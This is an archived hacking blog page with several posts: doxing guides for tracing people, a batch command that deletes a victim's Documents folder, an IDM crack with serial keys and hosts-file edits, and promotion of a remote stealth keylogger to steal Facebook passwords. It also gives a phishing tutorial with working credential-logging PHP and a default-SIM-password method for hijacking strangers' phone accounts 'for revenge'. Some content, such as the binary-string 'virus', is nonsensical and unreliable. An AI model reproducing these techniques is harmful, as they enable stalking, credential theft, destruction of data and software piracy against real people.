Showing posts with label HACKING. Show all posts
Showing posts with label HACKING. Show all posts

July 13, 2011

DOXING - A WAY OF TRACING ANONYMOUS PEOPLE


Doxing is a way of tracing someone or getting information about an individual using sources on the internet and social engineering techniques. It's term was derived from --Documents-- as a matter of fact its the retrieval of Documents on a person or an organization.

I saw a well detailed information on how to implement this techniques and i will be sharing it here. As presented by Chintan Gurjar below is a technique to trace an anonymous person.


What is Doxing ?

Doxing(“Documents” or “Docx”) is the part of technique “Tracing”. It plays an important role in tracing. To gathering all available information is called as doxing. In information there are many informations like documents,victim’s name, gender and also that on internet on which which website, the person is there and by which which name and nick name. We are choosing the specific target.In this tutorial i will show you how to get the information about any particular individual. Doxing is easy depends on the available information about the specific target and it also depends on that how many information is available of that specific target right now. Doxing technique is very useful to solve the “Cyber Crime Cases”.With the help of this tutorial you will come to know that how the hackers dox the innocent people and make them victim to hack their email id accounts, Facebook accounts and their websites by implementing social engineering techniques.

For the Specific Target Here are some parts for which you should collect the information.
(1) Name
(2) Gender
(3) Birthday
(4) Age
(5) Website
(6) Email Id
(7) Social Networking Site Profiles -> Facebook/Yahoo/Orkut/Twitter/My space
(8) Location/Area/Country
(9) IP – Address

Once hacker have all this information,the next step of hacker is to go to the http://www.google.com/ and he can input the name of the specific target.The target’s all social networking site profile id will display Google. Hacker will copy paste it and then open that link into his browser.Then he/she can see the every information about the target.If the target’s profile ids completely private then hacker can make a girl’s profile and then can add him/her.-( Best Solution :- Social Engineering Technique).

How To Do Doxing ?

(1)Using The Email Address Of Your Target

So, We have some basic very nice website to find the information about target.
Step 1 :- Click on the Email
Step 2 :- Provide Email address and then click on search.
Step 3 :- It will show all the profiles which is made by this email id which u have given to Pipl.com of target

Websites Used For Doxing :-
www.pipl.com (i will recommended you this)
www.wink.com
www.123people.com
www.zabasearch.com

(2)Using The Name Of Your Target

Here also We have some basic very nice website to find the information about target.
Step 1 :- Click on the Name
Step 2 :- Provide Name and then click on search.
Step 3 :- It will show all the profiles which is made by this name/nickname which u have given to Pipl.com of target .

Websites Used For Doxing :-
www.pipl.com (i will recommended you this)
www.wink.com
www.123people.com
www.zabasearch.com

(3)Using The Location Of Your Target

Here you can do doxing with the help of the adress also.There are some sites which provides this type of services.If target has given any adress to the any social networking website then you can trace it by the help of the given below website.
Websites :-
www.addresses.com
www.411locate.com
www.411.com
www.whitepages.com

Do Doxing With The Help of google

Google is the very nice site and source to do the doxing.
Example :- Here i m Providing name – “XYZ” and we will see that how one can mine the Google dork and can find the everything.

a. Inurl :- This is a very nice dork to find the website directly from the Google. Suppose i want to find the www.chintan.com then i will give this type of query.
Inurl:.sitename.com

b. Intitle :- This is also a nice query.if suppose on any page the world “XYZ” is written in the title then i can find it directly by this query.
Intitle:xyz

c. Intext :- On any webpage of the world,if the name is written like “xyz” then i can find by this a simple query.
Intext:xyz

Now we will bind this all query to do doxing.

Case 1 :- Suppose i want to find the person named “xyz” but only from this website www.site.com.Then i will make this query.
Inurl:.sitename.com & intitle:xyz or
Inurl:. sitename.com & intext:xyz
This query will give me the all result of the web page of the website freehacking.net which have this XYZ name on any particular page.

So, This are the basic techniques of doxing, and if you've got any tips and ideas you feel you can share, please don't hesitate to use the comment box.

June 24, 2011

HOW TO CRASH WINDOWS XP

now here is Virus to delete Windows..
its very simple.
Open Notepad
& just copy below code and past it on notepad
01001011000111110010010101010101010000011111100000
save it as ***.exe and send it to victim..
don’t run dis file on your system….. please be careful
NOTE: this is for information purpose only please don’t ever try on your or your friend’s PC.
creating a virus to delete my documents
Open notepad and copy-paste the following code in it.Then save the file with whatever name you like.But be sure to save it as a .bat file.I mean save it like myvirus.bat .It should have the ending as .bat.Now if you give this to some one and if he runs this program then,his my document folder will be deleted.

rmdir C:\Documents and Settings \S\Q.

June 5, 2011

HOW TO CRACK IDM


IDM is the best Internet download manager available on internet but its not free and its cracked or patched versions contains viruses.

Using this hack you can register the Internet Download Manager (IDM) for free using you own credentials i.e register on your Name and email ID.

I am explaining the manual hacking method because most of my users said that patch and keygen contain viruses.

This hack also works for trail IDM that means download a trail IDM from there site and register the professional i.e. full version of IDM with your credentials for free using my hack.


Hack or crack IDM manually :

Step 1: Download the IDM trial or If you already have IDM installed Update it by going to Help---}} then to check for Updates.If you don't wanna update your version, Just click on Registration.

Step2: When you click on registration, Now a new dialog(window) appears that is asking for Name, Last Name, Email Address and Serial Key.

Step3: Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:

RLDGN-OV9WU-5W589-6VZH1
HUDWE-UO689-6D27B-YM28M
UK3DV-E0MNW-MLQYX-GENA1
398ND-QNAGY-CMMZU-ZPI39
GZLJY-X50S3-0S20D-NFRF9
W3J5U-8U66N-D0B9M-54SLM
EC0Q6-QN7UH-5S3JB-YZMEK
UVQW0-X54FE-QW35Q-SNZF5
FJJTJ-J0FLF-QCVBK-A287M

And click on ok to register.

Step4: After you click ok, it will show an error message that you have registered IDM using fake serial key and IDM will exit. Now here the hack starts.

Step5: Now Go to START => Then go to RUN and type the following text and click enter:

notepad %windir%\system32\drivers\etc\hosts

Note : For Windows 7 users, due to security reasons you will not be able to save hosts file.
so follow this steps :
First of all go to C:/ drive then go to Windows Folder and then go to System32 folder and then go to Drivers folder and then go to Etc Folder, in the Etc folder you will see the hosts file.


Step6: Now right click on hosts file and go to its properties, then go to security tab and then select your admin account, just below u will see an edit button (in front of change permissions), Now give the user full control and write and read rights and then click on apply and then click on Ok, now u will be able to edit the hosts file and save changes in it.

Step7: Now a notepad file appears:

Now copy the below lines of code and add to hosts file as shown above image box :

127.0.0.1 tonec.com
127.0.0.1 www.tonec.com
127.0.0.1 registeridm.com
127.0.0.1 www.registeridm.com
127.0.0.1 secure.registeridm.com
127.0.0.1 internetdownloadmanager.com
127.0.0.1 www.internetdownloadmanager.com
127.0.0.1 secure.internetdownloadmanager.com
127.0.0.1 mirror.internetdownloadmanager.com
127.0.0.1 mirror2.internetdownloadmanager.com

After adding these piece of code, save the notepad file. And exit from there.

Now start your Internet download manager, and now you IDM has been converted to full version and specially when you update next time, your registration will not expire.

That means it will remain full version for life time and you can update it without any problem in future.

May 2, 2011

SQL Injection Basics


SQL injection can be termed as a code injection attack since all queries in SQL are nothing but interpreted codes. SQL injection is one the most dangerous web application vulnerabilities and most attackers consider it as a cream part while hacking since it can allow attacker to take over database and take full control of it. With time and tide web application security has evolved with respect to SQL injections since they were most common attacks used by attackers so today its little hard to find SQL injection vulnerabilities in web applications. But due to its large possibilities of attack styles SQL injection is one of the vastest topics that can be covered in web application security.
In fact even if you write a whole 500 plus pages book on SQL injection, effects, related strings and real attack strategies it’ll still remain incomplete. The guys who boast of knowing SQL injection completely I always doubt their words no matter how big his/her name may be in history of SQL injection.

In this post we will not cover real attack strategies but some basic commands related to SQL which will help you later to perform real attacks. All commands are tested on MYSQL.

create table website (name char(50), url char(100), topic char(20), type char(30));

Above query will create a table named website with name, URL, topic and type fields in it.

insert into website (‘INFO 4 QUIZ’ , ‘http://www.info4quiz.in’ , ‘Security’ , ‘Blog’);

Above query will add data to table website with
Name : INFO 4 QUIZ
URL : http://www.info4quiz.in
Topic: Security
Type: Blog

You can add more data in database using above query.

update website
set topic = ‘Hacking’ where name = ‘ INFO 4 QUIZ’;

Above query will replace ‘security’ by ‘Hacking’ in topic field for ‘ INFO 4 QUIZ’.

select * from website;

it will display all data in table website.

select * from website where topic = ‘security’ ;

it will display all data where topic is security

select name from website where topic = ‘security’;

it will display names of all websites where topic is security.

This post just meant for developing a little basics about SQL for those who want to learn SQL injection but are not aware of SQL.

April 29, 2011

UNLOCK YOUR MOBILE TO BREAK SECURITY PASSWORD BY GENERATING MASTER CODE

UNLOCK

STEP 1: Dial the code simply key *#o6# to finfd your Imei no,this may also be found on the battery of your phone.

STEP 2: Call the no ,dial 09065910367 & type your IMEI code to obtain your unlock code.

STEP 3: Enter the instantly generated unlocking code & your mobile phone will be unlocked.


April 23, 2011

Hack Facebook Password – Facebook Hacking


Wondering to know how to hack Facebook password? Well, before you can do that, it is very much necessary to understand the real ways of hacking that actually work and also those that are simply scam and do not work. So in this post, we’ll look at some of the possible ways to hack Facebook password!
Every day I get a lot of emails from people requesting me to hack Facebook passwords of their spouse, girlfriend or boyfriend so as to reveal their secret relationships (if any). Most of them are even willing to pay for the service. However, I strongly deny any such requests since I do not provide any paid hacking service. But anyhow, I have decided to write down this post so that you can learn the tricks for yourself and implement everything at your own risk.

Possible Ways to Hack Facebook Password

1. Keylogging – The Easiest Way!

Keylogging refers to simply recording each and every keystroke that is typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this program will automatically load from the start-up, runs in the invisible mode and start capturing each and every keystroke that was typed on the computer.
Some keyloggers with advanced features can also capture screenshots and monitor every activity of the computer. One doesn’t need to have any special knowledge in order to install and use a keylogger. That means, anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack Facebook password. I recommend the following keylogger as the best for gaining access to Facebook account.

SniperSpy (TESTED) is a revolutionary product that will allow you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail or Hotmail. There are absolutely *NO* limitations to what accounts or websites this software can access!
Why SniperSpy is the best?
Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However, there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this, you can install it on a remote computer without the need for having physical access to it. It operates in a complete stealth mode so that it remains undetected.

Here is a summary of benefits that you will receive with Sniperspy software:

1.Access ANY Password
With SniperSpy you can hack any password and gain access to Facebook or any other online account.

2. Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.

3. Never Get Caught!
SniperSpy operates in a total stealth mode and thus remains undetectable. Therefore you need not have the fear of being traced or getting caught.

4. Remote Installation Feature
With the Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However, it can also be installed on a local computer.

5. Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.

6. Completely Safe to Use
This software is 100% safe to use since it does not collect any personal information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.

7. Works on both Windows and Mac
Fully compatible with Windows 2000/XP/Vista/7 and Mac.

April 21, 2011

TRACE ANYONES MOBILE INSTANTLY WITH GPS & WITHOUT GPS FOR FREE


TRACE ANYONES MOBILE INSTANTLY WITH GPS & WITHOUT GPS FOR FREE

Yes Guys, this is now possible...I m not jokingMany of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done. Yes, PhoneOnMap makes it possible, which provides a free application that has to be installed in GPS cell phone and you are ready to track the phone from anywhere on the Internet.



This application can be useful for office work as well as family members. You can track your child as well as your girlfrend/wife too (LOL) . This PhoneOnMap can be used worldwide and you can use it while travelling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketting department of an organization to track the marketing agents.



If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access the tracking system, you have to authenticate yourself through a personal code which was used as identification while installingapplication on cell phone.



Features of GPS cell phone tracking system :-
1. GPS cell phone tracker and locater will not work in the underground transportation .



2. The application does not work when the phone is turned off.



3. The data transmission outside provider’s coverage area will add roaming charges like any other phone service charge us .



4. Once application is uninstalled from cell phone than you can’t do anything .



5. On internet tracking system will show cell phone location between every 10 seconds to 10 minutes , which is depend on setting .



Accordng to me this kind of service is very important for parents to track their children and from a business usage point of view an invaluable part of companies involved in supply and delvery system like Courrier and Home delivery system. This will help them to get a realtime location of the object and provide an accurate timeframe for the delivery.



As of now this service does not provide the exact pin point location but the location determined s in the range of 10-20 meters. However with little intelligence the exact location can be easily determined especially when you wish to track your children or the cheating girlfrend…(lol)

April 14, 2011

PHISHING: A MODERN TECHNIQUE OF EMAIL HACKING

Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take, will help you defend against such an attack.
1. First the hacker chooses a target. The most popular targets for phishing attacks are e-mail services such as Hotmail and Gmail because they are the most common and once a hacker gets access to your e-mail, he also gets access to a load of other user information for all the other websites you use. In this example we will pretend the hacker chose Gmail as his target.2. After choosing his target, the hacker will go to the website and save the whole main page. I use Mozilla Firefox ,(highly recommend using this browser for its security and customization.) So I would go to www.gmail.com and click File -> Save page as… , or simply hit + S which does this automatically. Choose where you would like to save the web page and it save.

3. Once you have it saved, rename ServiceLogin.htm to index.htm. The reason you want to name it “index” is so when you upload it to a web host and someone goes to your link, the index page is the first page that shows up.
4. Next the hacker would create a PHP script to do his dirty deed of steeling your information. Below is a simple PHP script that logs and stores your login details when you click “Sign in”. To see how it works, copy and paste the following code into notepad. Next save it into the same directory as you saved the Gmail page, and name it phish.php. In addition to the phish.php page, create a new empty text file and name it list.txt.
Header(“Location: https://www.google.com/accounts/ServiceLogin?
service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com
%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcache=2 “); // once you click “Sign in” in the fake website, this redirects you to the real Gmail website, making the whole process look more legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file “list.txt” and get it ready for appending data. Which in this case is your username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file “list.txt”
exit;
?> // Marks the end of the PHP program.
So far you should see the following in your folder:

5. Now the hacker would have to edit the main Gmail page to include his PHP script. To see what the hacker would do, open up the main Gmail page named index.htm with notepad.
6. Hit + F , or go to Edit -> Find , type in action and hit “Find Next”.

7. This will highlight the first occurrence of the word “action” in the script and you should see the following:
There are two “action” occurrences in the script so make sure you have the right one by looking at the “form id” name above. Change the link between action = “ “ to phish.php . This will make the form submit to your PHP phish script instead of to Google. After the link you will see the code:
Change the word “POST” to “GET” so that it looks like method=”GET”. What the GET method does is submit the information you type in through the URL so that the PHP script can log it.
8. Save and close the file.
9. Next the hacker would upload the files up to a free webhost that supports PHP. With a simple Google search you can come up with a bunch that fall under this category.
10. Once all the files are uploaded, you must give writing permissions to the “list.txt” file. Every hosting company should have a CHMOD option next to each file. Select this option and change the file permission for “list.txt” to 777. If you can’t figure out how to do this, ask people that use the same host or simply Google something similar to: “yourwebhostname chmod”.
11. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page.
12. Now go take a look at your list.txt file by going through your hosting file manager or going to http://www.yourwebhosturl.com/youraccount/list.txt. Although this is the most common, the web host you use may provide a different looking URL. Now if I put a username of “myusername” and a password of “mypassword” then “list.txt” would now look like the following:




As you can see if you fell for this the hacker would have your email and password. Scary, eh?

March 26, 2011

HOW TO TRACE AN UNKNOWN MOBILE NUMBER


1. The first step is to Find the unknown number's Operator. For that you can take the help of Mobile number Tracing sites. Here are some usefull Links:

Indiatrace.com - Mobile Number Location Trace

BharatiyaMobile.com - Trace Indian Mobile Location & Operator

Go to any of the above links; Type the Unknown number and note down the Results. The result will be the "Operator Name" and "State".

Suppose your Unknown number is 9876547892 : After Tracing we Get the Result : "West bengal" & "Airtel".

2. Now starts the Trick: Search for the Ten Digit customer care Number of the Unknown number; Every state has a different customer care number; so be careful.
[NOTE: Search for 10 Digit customer care Number]

In my case I should search for West bengal - Airtel's 10 digit customer care number.

3. After you find the 10 digit customer care number - Call the customer care from a different Operator (Different from the Unknown Numbers Operator)
Suppose the Unknown Number uses Airtel; You should call from other Operators SIM like BSNL, Reliance, Docomo, Idea or Vodafone

4. When connected the customer care opt you for Languge selection.

5. After Language selection they will ask you: Are you a current User of xxxxx operator??
So Press "YES" or say "YES"
In my case they will ask me Are you a current User of Airtel?? So i will say "Yes"

6. Now they will ask you to enter the 10 digit Mobile Number (UNKNOWN NUMBER)
In my case I will enter 9876547892

7. Now they will ask you to enter a password. So enter:- 1234
[1234 is the default password of sim card; Most of us do not change SIM Password so there is 95% success rate of 1234]

8. After you successfully enter the Password - Now its your turn to seek Revenge.

* You can Know the Balance and Validity
* Activate Caller tune services
* Activate other Packs or subscribe V.A.S
* And many other things.

==CUSTOMER CARE NUMBERS==
Airtel – Kolkata 98310-12345
Airtel – Rest of Bengal 99330-12345
Aircel – Kolkata 98040-12345
Aircel – Rest of Bengal 98510-12345
BSNL – Kolkata 98830-98830
BSNL – Rest of Bengal 94000-24365
Reliance (GSM) – Kolkata
98830-98830
Reliance (GSM) – Rest of Bengal
98320-98320
Reliance 3033-3333
Tata Indicom – Kolkata
92310-08282
Tata Indicom – Rest of Bengal
92330-08282
Vodafone – Kolkata 98300-98300
Vodafone – Rest of Bengal
97320-97320
Tata Docomo- 90460-12345
( Kolkata 90380-12345 )

March 19, 2011

How To Block Websites Without Software

This summary is not available. Please click here to view the post.